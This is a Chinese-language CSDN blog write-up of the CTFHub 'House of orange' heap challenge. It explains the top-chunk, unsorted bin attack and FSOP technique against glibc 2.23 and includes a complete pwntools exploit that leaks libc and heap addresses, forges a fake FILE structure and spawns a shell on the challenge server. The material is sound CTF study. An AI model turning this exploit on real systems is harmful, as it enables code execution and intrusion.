CTFHub[技能树]-----House of orange

于 2023-02-10 11:27:25 发布
阅读量186 收藏 2
点赞数
分类专栏: PWN 文章标签: 安全 网络安全 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaliLinux_V/article/details/128966835
版权

House of orange也是我第一次学,边学边做题,来来回回折腾了8小时,代码检查了一遍又一遍,没问题但总是打不成功,最后百度查了一下这个是概率成功,我哭了。白白浪费了这么久时间。

参考文章

pwn题堆利用的一些姿势 – IO_FILE

关于house of orange(unsorted bin attack &&FSOP)的学习总结

思路:

House of orange改top chunk的size位,之后申请一个大于top chunk的大小的chunk,会把old top chunk释放掉,之后就可以泄露地址。改写free chunk的内容。然后利用unsorted bin attack吧main_arena+88的地址写进 _IO_list_all

这里是篡改unsorted bin的之后内容,申请一个small bin大小的chunk拿到shell

在这里插入图片描述

EXP:

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",20723)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))


def add(size,data):
	ru(b"Input your choice >> \n")
	sl(b"1")
	ru(b"How long is your note?")
	sl(str(size))
	ru(b"Please write your note now:")
	s(data)

def show():
	ru(b"Input your choice >> \n")
	sl(b"2")


def edit(idx,size,data):
	ru(b"Input your choice >> \n")
	sl(b"3")
	ru(b"Which note do you want to change?")
	sl(str(idx))
	ru(b"Please input the size of your note:")
	sl(str(size))
	ru(b"Please write your new note:")
	s(data)



add(0x20,b"aaaa")
edit(0,-1,p64(0)*5+p64(0xfd1))
add(0x1000,b"a")
add(0x400,b"b"*8)


show()
ru(b"b"*8)
main_arena = uu64(r(6))
libc_base = main_arena-1640-0x10-libc.sym['__malloc_hook']
io_list_all = libc_base+libc.sym["_IO_list_all"]
system = libc_base+libc.sym["system"]
print("libc_base-------------->: ",hex(libc_base))
print("io_list_all-------------->: ",hex(io_list_all))

edit(2,-1,b"c"*0x10)
show()
ru(b"c"*0x10)
heap_addr = uu64(r(6))-0x30
print("heap_addr-------------------->: ",hex(heap_addr))

payload = b"a"*0x400
fake = b"/bin/sh\x00"+p64(0x61)
fake += p64(0)+p64(io_list_all-0x10)
fake += p64(0)+p64(1)
fake = fake.ljust(0xd8,b"\x00")
fake += p64(heap_addr+0x520)
fake += p64(0)*3+p64(system)
payload += fake

edit(2,-1,payload)
ru(b"Input your choice >> \n")
sl(b"1")
ru(b"How long is your note?")
sl(str(0x10))

sl(b"ls")
#gdb.attach(io)



itr()
saulgoodman-q
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
house-hunting-app
05-07
房屋狩猎应用 :house: 房屋搜索应用程序,可方便地访问和出租可用房屋 现场演示 :television: 使用以下凭证: 电子邮件: 密码:123456789 主要问题 :new_moon_face: 大多数打算结婚或正在寻找房屋的人会发现很难...
【PWN】House of Orange&House of Pig(待完整例题)
u014377094的博客
05-06 616
House of Orange House of Orange的利用背景在缺少free条件。为了达到free的效果,通过修改top chunk的size位,当malloc的空间大于top chunk时触发brk,使top chunk被放置在unsorted bin。 利用条件: 1.堆有 mmap 和 brk 两种分配方式,我们需要让堆以 brk 的形式拓展,之后原有的 top chunk 会被置于 unsorted bin 中。要实现 brk 拓展 top chunk,但是要实现这个目的需要绕过一.
PWN技巧之_IO_FILE结构体利用house of orange
aptx4869_li的博客
02-16 1040
PWN技巧之_IO_FILE结构体利用house of orange
2016-HitCon-Pwn-house_of_orange学习(附赠FSOP基础知识)
最新发布
a2590035252的博客
10-25 540
[md]这里开始著名的house of orange利用方式讲解 house of orange 介绍 House of Orange 与其他的 House of XX 利用方法不同,这种利用方法来自于 Hitcon CTF 2016 中的一道同名题目。由于这种利用方法在此前的 CTF 题目中没有出现过,因此之后出现的一系列衍生题目的利用方法我们称之为 House of Orange。 概述 House of Orange 的利用比较特殊,首先需要目标漏洞是堆上的漏洞但是特殊之处在于题目中不存在 free
攻防世界PWN之Poisonous_Milk(认清vector的结构+house of orange利用)
seaaseesa的博客
02-19 1406
Poisonous_Milk 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,发现是c++写的程序,看起来复杂了很多,这些一大堆,作用只是打印菜单,那么我们把这个函数重命名为menu。 接下来,我们进入下一个函数查看,应该就是主功能区了。 为了便于分析,我们给函数重命名了 创建内容的函数里,最多输入86个字符 实际上只能输入85个字符,并且最后一个会被...
house of orange
m0_62326489的博客
09-04 123
1
House-Price-Model-Deployment
05-04
Flask&Heroku房屋价格模型部署 项目链接(与Heroku一起部署): 目标 在此项目中,我们的目标是根据在Deploy环境中提供的字段中输入的信息来估算房屋的价格。 要求 您需要按原样复制或存储库。...
house-agent.rar
03-26
本项目"house-agent.rar"就是一个典型的应用实例,它巧妙地结合了多个技术组件,构建了一个功能完备的房地产中介系统。下面,我们将深入探讨其中涉及的关键技术点。 首先,SpringBoot是Spring框架的简化版本,它...
ddd-house::house: 用 DDD 盖房子
06-29
滴滴之家该存储库用于“用 DDD 建造房屋”。 这是让我了解我最近学习的一些概念的一种方式。 例如以下内容:命令和处理程序命令总线领域事件BDD(使用 Behat 和 PHPSpec)我最大的目标是实现层的分离。...
PHPWind House v1.0 utf-8.zip
07-07
地方网站的盈利点,从行业来说,大概有房产、家装、婚庆交友、美食、母婴、汽车,还有家政、美容、培训等等。我们在去年9月份的时候,就推出了分类信息的功能,其中包括了几大刚性需求,即:房产、婚庆、母婴、美食...
houseoforange_hitcon_2016
z1r0的博客
03-09 480
houseoforange_hitcon_2016 查看保护 这一题目就是使用house of orange + FSOP来解决 在edit的时候会让用户输入size,这里有一个堆溢出(笔者认为这一题还有一个考点就是逆清楚这个程序,自己增加结构体 这是笔者加的两个结构体,看成这样就行 struct Data{ Info *info; char *name } struct Info{ int price; int color; } 加了这个之后改一下堆块的类型就可以更快的清楚这个程序的结构。 回归
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 400
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
Hitcon CTF 2016 - house of orange 做题笔记
fa1c4的blog
03-31 1074
前言 深入学习pwn的高级堆利用方法, house of orange是绕不开的难关 之前已经接触了house系列题目, 不过由于心理压迫感, 所以迟迟没有开始调试house的漏洞 现在避无可避了, 于是准备集中精力突破掉house of orange 想要打过BOSS得先升级, 但是为了升级必须先打过BOSS (雾~ 分析过程 CTFhub和BUUCTF的题目有差别, 就按BUU来打吧 漏洞利用 总结 参考 ...
BUUCTF-pwn(17)
njh18790816639的博客
04-17 642
happytree(SUSCTF) 分析主要函数! 主要三步操作,Insert、Delete、Show函数! 可以看到其为二叉结构体! 因为全保护开启,故具体思路为泄露地址(heap、libc),然后利用libc2.27版本tcache的double free来修改__free_hook函数为system函数, 此时首先设置基准为0x50,此时分为两部分,左子用来泄露heap地址并造成double free的效果,右子来泄露libc地址并申请造成攻击效果! 首先发现可以从0x?0申请到0x?8
堆溢出-House of orange 学习笔记(看雪论坛)
happylzs2008的专栏
01-07 879
https://www.jianshu.com/p/4b0a73f321f9 前几天把House of orange重新学习了一下,比照着glibc malloc的源码好好分析了一下,希望做到真正做到知其然亦知其所以然,其中所做的笔记如下,可能描述上有点乱,大家将就着看一下吧。同时,我也发在了我个人博客上面 (http://blog.leanote.com/simp1e), 如果有错误的地方,...
the house of orange解析
小强的博客
11-24 2208
先以这个最简单的例子举例: https://github.com/shellphish/how2heap/blob/master/house_of_orange.c 编译生成ELF文件(64位) p1 = malloc(0x400-16); 每次创建堆都是从top chunk上切割堆块,由于top chunk默认是0x21000,因为我们已经申请了0x400大小的堆,所以此时to
攻防世界 进阶 houseoforange
yongbaoii的博客
03-12 657
就是house of orange 跟题目名字一摸一样。 保护 绿油油 build 备注一写顿时简单了起来。 结构分析一下。 那orange的颜色要么就是56746,要么就是0到6. see 然后呢这里56746跟30到36输出是不一样的。 upgrade 房子只能申请三个,改也只能改三次。 对修改的大小没有限制,所以就会有堆溢出。 那问题来了,怎么利用? 他没有free函数,这就是标准的house of orange 我们总体的思路是这样的。 创建第一个house,修改top_chunk的siz
house of orange学习报告
qq_35467337的博客
03-08 804
house of orangehouse of orange 不是什么梗,而是一道题目的名字,记录下hitcon 2016ctf house of orange
cscctf_2019_final_childrenheap(house of orange)
seaaseesa的博客
04-30 644
cscctf_2019_final_childrenheap 首先,检查一下程序的保护机制 然后用IDA分析一下 Update功能存在一个null off by one 禁用了fastbin,因此不能fastbin attack。那么可以利用house of orange或者large bin attack,个人认为house of orange较为简单一些。 利用null ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值